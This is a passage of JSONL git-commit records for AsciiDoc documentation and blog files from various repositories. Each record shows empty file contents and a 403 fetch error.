2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e25edff1be9b46dee0d2fe289cbec4fa733e31bd","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0cae3734a694e901c93f6876fdda16b1728c357","subject":"Update 2018-09-16-Vuex.adoc","message":"Update 2018-09-16-Vuex.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-16-Vuex.adoc","new_file":"_posts\/2018-09-16-Vuex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78e0b977ebf6be14f751e9c7c8296560e8595307","subject":"Update 2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","message":"Update 2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","new_file":"_posts\/2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8acf7ff698ac9501a1471b0d04ef49b83884b8ed","subject":"Updated README","message":"Updated README\n","repos":"mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,goldobin\/resilience4j","old_file":"src\/docs\/asciidoc\/introduction.adoc","new_file":"src\/docs\/asciidoc\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12d3fd7ae7b2009dc4d77f0d5b7aa92fad8ddef4","subject":"Proposed Blog Post Template","message":"Proposed Blog Post Template\n\nI think I've covered the basics in here. All you'll need to do is add placeholder images in the code so they render the examples","repos":"alchapone\/alchapone.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,TheAshwanik\/new,TheAshwanik\/new,alchapone\/alchapone.github.io,TheAshwanik\/new,Git-Host\/Git-Host.io,alchapone\/alchapone.github.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io","old_file":"docs\/Template.adoc","new_file":"docs\/Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e9dfb334889258ff9205004ed8a851e1bc67d83","subject":"Docs: Specify that byte units use powers of 1024 (#23574)","message":"Docs: Specify that byte units use powers of 1024 (#23574)\n\nIn SI units, \"kilobyte\" or \"kB\" would mean 1000 bytes, whereas \"KiB\" is\r\nused for 1024. Add a note in `api-conventions.asciidoc` to clarify the\r\nmeaning in Elasticsearch.","repos":"brandonkearby\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,Shepard1212\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elassandra,mohit\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,glefloch\/elasticsearch,uschindler\/elasticsearch,nazarewk\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elasticassandra,shreejay\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,kalimatas\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,nezirus\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,kalimatas\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,Shepard1212\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/api-conventions.asciidoc","new_file":"docs\/reference\/api-conventions.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8494def943e1ea17cbaf6551c21af3af6df8766","subject":"Update 2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","message":"Update 2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","new_file":"_posts\/2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf39ac1f2f093b399abf541b8e90d03b9c4ba899","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d810e173bd863b94d8421a8b6ed31f69a8210eaf","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f2fbe630f1c16d9daee2c8ce2d8ae6f38592a86","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c73a7bda122754d2aa2a425214f9a03b0f47c604","subject":"Update 2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","message":"Update 2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","new_file":"_posts\/2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee6f21f07d37b510d95666bfea845435f948928d","subject":"NMS-6687: Initial revision of SshMonitor","message":"NMS-6687: Initial revision of SshMonitor\n\nhttp:\/\/issues.opennms.org\/browse\/NMS-6687\n\nCyrille\n","repos":"tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"9dff60d10a06330c875a19f21c637494cd30f40b","subject":"Remove migration error message","message":"Remove migration error message\n","repos":"mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/articles\/UsingDeclarativeServices.asciidoc","new_file":"documentation\/articles\/UsingDeclarativeServices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80dcfd27357b93e9fe8c17324fabdd15dcb6c7f4","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5c46dde40b00c771d3050f1f892ab79eddfe57","subject":"Create Contributing.adoc","message":"Create Contributing.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/Contributing.adoc","new_file":"wiki\/Contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1f16193eb7e67a912668bb6bf472d48a92504a5","subject":"Update 2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","message":"Update 2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","new_file":"_posts\/2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39dca9772c7a5f95b5cf74c4c7dc566b6b33e60d","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83877ea694fdaad898577fd523f86072cf8a2562","subject":"Fix content type in Watcher docs","message":"Fix content type in Watcher docs\n\nWith this commit we change the incorrect content type `image.png` to `image\/png`\r\nin an example snippet in the Watcher docs.\r\n\r\nRelates #33955","repos":"gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"x-pack\/docs\/en\/watcher\/actions\/email.asciidoc","new_file":"x-pack\/docs\/en\/watcher\/actions\/email.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f733317869b4500683214040207dd0ec7fd447f7","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d5008e970fc9260125a5dc09746899c8490777","subject":"Build from source in debug mode on OS X","message":"Build from source in debug mode on OS X\n\nKudu fails to link when building in release mode on OS X because of missing\nlibc++ symbols in the Boost static library. This will no longer be an issue when\nwe move to c++11, and begin linking against libc++ on OS X.\n\nChange-Id: Ief9ff98578069c35eb54576f8e262b43afbc5569\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1536\nReviewed-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\nTested-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@danburkert.com>\n","repos":"helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c473c0139b4d57c4841397e4362a238dc0819a","subject":"Update 2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9001d30306b869d22acb245a65464e38496ad7d5","subject":"Update 2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","message":"Update 2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","new_file":"_posts\/2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e5a651c8e052cdbcad73f6af5ce065ffd6dbce4","subject":"minor update doc","message":"minor update doc\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_analytics.asciidoc","new_file":"doc\/trex_analytics.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b493e88846f2ae50a82edb3cf8086d90db11b3c","subject":"Adding post 'Five Advantages of Log-Based CDC'","message":"Adding post 'Five Advantages of Log-Based CDC'\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-07-19-advantages-of-log-based-change-data-capture.adoc","new_file":"blog\/2018-07-19-advantages-of-log-based-change-data-capture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66f132759bd41d88fe5a4397a0e9a776752472cb","subject":"Update 2017-09-09.adoc","message":"Update 2017-09-09.adoc","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2017-09-09.adoc","new_file":"_posts\/2017-09-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65eee7b112d9e13a233cf14219e2bb40429640cc","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eb5ac5c7abc2b94138ee32a85a217fd6f162c36","subject":"y2b create post This iPhone Case Helps You Start New Relationships","message":"y2b create post This iPhone Case Helps You Start New Relationships","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-10-This-iPhone-Case-Helps-You-Start-New-Relationships.adoc","new_file":"_posts\/2016-08-10-This-iPhone-Case-Helps-You-Start-New-Relationships.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e38f0234c9d9ae889fa786539136b973ba80d98e","subject":"README: use spaces for indentation","message":"README: use spaces for indentation\n","repos":"pjanouch\/sdn","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 